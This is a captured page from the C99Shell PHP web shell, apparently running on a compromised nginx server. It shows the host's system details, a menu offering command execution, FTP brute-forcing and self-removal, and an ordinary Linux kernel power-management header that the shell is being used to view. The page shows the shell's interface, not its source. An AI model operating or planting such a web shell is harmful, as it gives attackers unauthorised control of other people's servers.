!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/src/linux-oracle-headers-5.15.0-1040/arch/powerpc/include/asm/   drwxr-xr-x
Free 83.33 GB of 96.73 GB (86.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     fsl_pm.h (1.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0-or-later */
/*
 * Support Power Management
 *
 * Copyright 2014-2015 Freescale Semiconductor Inc.
 */
#ifndef __PPC_FSL_PM_H
#define __PPC_FSL_PM_H

#define E500_PM_PH10    1
#define E500_PM_PH15    2
#define E500_PM_PH20    3
#define E500_PM_PH30    4
#define E500_PM_DOZE    E500_PM_PH10
#define E500_PM_NAP    E500_PM_PH15

#define PLAT_PM_SLEEP    20
#define PLAT_PM_LPM20    30

#define FSL_PM_SLEEP        (1 << 0)
#define FSL_PM_DEEP_SLEEP    (1 << 1)

struct fsl_pm_ops {
    /* mask pending interrupts to the RCPM from MPIC */
    void (*irq_mask)(int cpu);

    /* unmask pending interrupts to the RCPM from MPIC */
    void (*irq_unmask)(int cpu);
    void (*cpu_enter_state)(int cpu, int state);
    void (*cpu_exit_state)(int cpu, int state);
    void (*cpu_up_prepare)(int cpu);
    void (*cpu_die)(int cpu);
    int (*plat_enter_sleep)(void);
    void (*freeze_time_base)(bool freeze);

    /* keep the power of IP blocks during sleep/deep sleep */
    void (*set_ip_power)(bool enable, u32 mask);

    /* get platform supported power management modes */
    unsigned int (*get_pm_modes)(void);
};

extern const struct fsl_pm_ops *qoriq_pm_ops;

int __init fsl_rcpm_init(void);

#endif /* __PPC_FSL_PM_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0041 ]--